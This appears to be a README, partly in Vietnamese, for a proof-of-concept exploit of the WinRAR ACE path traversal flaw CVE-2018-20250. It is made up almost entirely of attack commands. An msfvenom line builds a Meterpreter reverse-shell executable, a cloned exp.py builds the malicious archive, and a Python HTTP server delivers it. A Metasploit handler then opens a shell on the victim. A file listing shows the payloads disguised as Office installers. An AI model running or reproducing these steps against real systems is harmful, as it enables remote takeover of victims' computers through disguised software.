## Setup
- Video demo: https://youtu.be/5tuWsi1tGS0
- VirtualBox Machine: https://j2c.cc/virtualbox-machine
- Winrar 5.5 32bit: https://j2c.cc/winrar-550-32bit
## Các bước tiến hành
- Kali:
```
ip a
msfvenom -p windows/meterpreter/reverse_tcp lport=1234 lhost=10.0.0.199 -f exe > shell.exe
```
- Windows:
```
git clone https://github.com/LamSonBinh/CVE-2018-20250
py exp.py
```
- Kali:
```
python3 -m http.server
```
- Windows:
10.0.0.199:8000
- Kali:
```
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 1234
set lhost 10.0.0.199
exploit -j
sessions
sessions 1
sysinfo
shell
```
[4.0K] /data/pocs/5da26d9612d71413ac431d52f16b5f8fea5ff223
├── [ 45] account.txt
├── [155K] acefile.py
├── [4.0K] exp.py
├── [8.0M] Office365Setup.rar
├── [8.0M] OfficeSetup.exe
├── [ 630] README.md
└── [ 72K] shell.exe
0 directories, 7 files